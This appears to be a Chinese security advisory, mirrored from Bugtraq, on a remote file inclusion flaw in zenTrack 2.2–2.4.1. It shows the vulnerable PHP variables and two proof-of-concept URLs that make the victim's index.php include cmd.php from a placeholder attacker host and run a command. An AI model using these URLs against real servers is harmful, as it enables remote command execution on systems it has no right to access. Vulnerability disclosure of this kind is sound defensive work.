Zentrack index.php远程文件包含漏洞
发布日期:2003-06-07
更新日期:2003-06-13
受影响系统:Zendocs zenTrack 2.4.1
Zendocs zenTrack 2.4
Zendocs zenTrack 2.3.2
Zendocs zenTrack 2.3.1
Zendocs zenTrack 2.3
Zendocs zenTrack 2.2.2
Zendocs zenTrack 2.2.1
Zendocs zenTrack 2.2
描述:
BUGTRAQ ID:
7843
zenTrack是一款跟踪工作,客户请求,并可对信息进行归档的应用系统。
zenTrack包含的'index.php'脚本对用户提供的变量缺少充分过滤,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。
zenTrack的'header.php'脚本包含如下代码:
<?
:
$libDir = "/web/zentrack/includes";
$rootUrl = "
http://www.yourhost.com/zentrack";
$Debug_Mode = 0;
$Demo_Mode = "off";
$configFile = "$libDir/configVars.php";
:
?>
'$libDir'和'configFile'变量用于从用户输入中直接获得包含文件,当'index.php'脚本作为参数进行调用时由于没有进行初始化,因此可以通过全局注入来进行变量定义,攻击者可以指定远程系统中的PHP文件作为参数提交给'$libDir'和'configFile'变量,可导致以WEB服务进程权限执行PHP文件中包含的恶意代码。
<*来源:farking (farking@i-ownur.info)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=105493642707616&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
farking (farking@i-ownur.info)提供了如下测试方法:
http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php?cmd=pwd
或
http://[victim]/zentrack/www/index.php?libDir=http://[attacker]/test/&cmd=pwd
建议:
厂商补丁:
Zendocs
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/zentrack/浏览次数:3224
严重程度:0(网友投票)